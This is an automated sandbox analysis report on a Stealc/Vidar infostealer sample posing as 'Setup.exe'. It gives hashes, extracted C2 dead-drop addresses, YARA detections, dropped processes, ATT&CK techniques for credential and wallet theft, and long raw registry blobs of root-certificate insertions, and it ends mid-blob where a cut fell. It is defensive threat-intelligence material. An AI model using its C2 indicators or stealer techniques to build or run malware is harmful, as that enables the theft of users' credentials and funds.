stealc | b27f2ffda5054c513a5f0dc3bbdc067c78a82f2be201334703f1b45e477cd067

Analysis

max time kernel
31s
max time network
32s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
08/07/2024, 23:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Setup.exe
Size

2.0MB
MD5

e3d5b216c73c93fa570be1776d81da90
SHA1

dc66ddc93ed23831977a6dcf08a7b27786e0d169
SHA256

b27f2ffda5054c513a5f0dc3bbdc067c78a82f2be201334703f1b45e477cd067
SHA512

45a1d097a9e3f164c8b503f4aee0d3afcb747a57f0058c6f0f243f01739a7ecb5636095a72b04a38c0dd6cb0c3f8c12ccafdfd0051dc81f99911f657f9236669
SSDEEP

49152:KDjlabwz9ZDjlabwz9F62WMAQaPXvvvELJ8LPel0Pk:6qwvqwhBAh/vvYJ4PLM

Score

10^/10

stealc vidar discovery spyware stealer themida

Malware Config

Extracted

Family

vidar

https://t.me/bu77un

https://steamcommunity.com/profiles/76561199730044335

Attributes

user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.1) Gecko/20100101 Firefox/128.1

Signatures

Detect Vidar Stealer 3 IoCs

stealer

resource	yara_rule
behavioral1/memory/2832-352-0x00000000012D0000-0x000000000187D000-memory.dmp	family_vidar_v7
behavioral1/memory/2832-414-0x00000000012D0000-0x000000000187D000-memory.dmp	family_vidar_v7
behavioral1/memory/2832-642-0x00000000012D0000-0x000000000187D000-memory.dmp	family_vidar_v7

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Downloads MZ/PE file

Executes dropped EXE 13 IoCs

pid	Process
2776	pikola.exe
2832	rgawth.exe
2804	GHDHDB.exe
2728	GHDHDB.exe
2712	GHDHDB.exe
2924	GHDHDB.exe
2612	GHDHDB.exe
2724	GHDHDB.exe
2756	GHDHDB.exe
2640	GHDHDB.exe
1632	GHDHDB.exe
2660	GHDHDB.exe
3044	GHDHDB.exe

Loads dropped DLL 3 IoCs

pid	Process
2384	cmd.exe
2832	rgawth.exe
2832	rgawth.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 1 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x0006000000018bf9-622.dat	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
31	bitbucket.org
32	bitbucket.org
49	bitbucket.org
52	bitbucket.org

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
2832	rgawth.exe
2832	rgawth.exe
2832	rgawth.exe
2832	rgawth.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	rgawth.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	rgawth.exe

Modifies system certificate store 2 TTPs 13 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	rgawth.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	rgawth.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	rgawth.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	GHDHDB.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	rgawth.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	rgawth.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	rgawth.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 040000000100000010000000324a4bbbc863699bbe749ac6dd1d46240f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a190000000100000010000000fd960962ac6938e0d4b0769aa1a64e262000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	GHDHDB.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	rgawth.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	rgawth.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	rgawth.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6	rgawth.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d